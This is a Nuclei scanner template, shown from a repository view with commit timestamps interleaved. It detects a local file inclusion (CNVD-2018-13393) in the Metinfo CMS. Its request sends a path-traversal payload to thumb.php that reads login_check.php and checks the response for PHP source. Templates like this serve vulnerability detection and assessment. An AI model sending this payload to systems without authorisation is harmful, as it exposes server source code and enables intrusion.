nuclei-templates/cnvd/2018/CNVD-2018-13393.yaml

33 lines
759 B
YAML
Raw Normal View History

2022-04-11 12:39:52 +00:00
id: CNVD-2018-13393
info:
name: Metinfo - Local File Inclusion
2022-04-11 12:39:52 +00:00
author: ritikchaddha
severity: high
description: Metinfo is susceptible to local file inclusion.
reference:
- https://paper.seebug.org/676/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score: 8.6
cwe-id: CWE-22
2022-04-11 19:56:57 +00:00
tags: metinfo,cnvd,cvnd2018,lfi
2022-04-11 12:39:52 +00:00
requests:
- method: GET
path:
2022-04-11 19:56:57 +00:00
- '{{BaseURL}}/include/thumb.php?dir=http\..\admin\login\login_check.php'
2022-04-11 12:39:52 +00:00
host-redirects: true
2022-04-11 12:39:52 +00:00
max-redirects: 2
matchers-condition: and
matchers:
- type: word
2022-04-11 19:56:57 +00:00
part: body
2022-04-11 12:39:52 +00:00
words:
- "<?php"
- "login_met_cookie($metinfo_admin_name);"
2022-04-11 19:56:57 +00:00
condition: and
# Enhanced by mp on 2022/07/05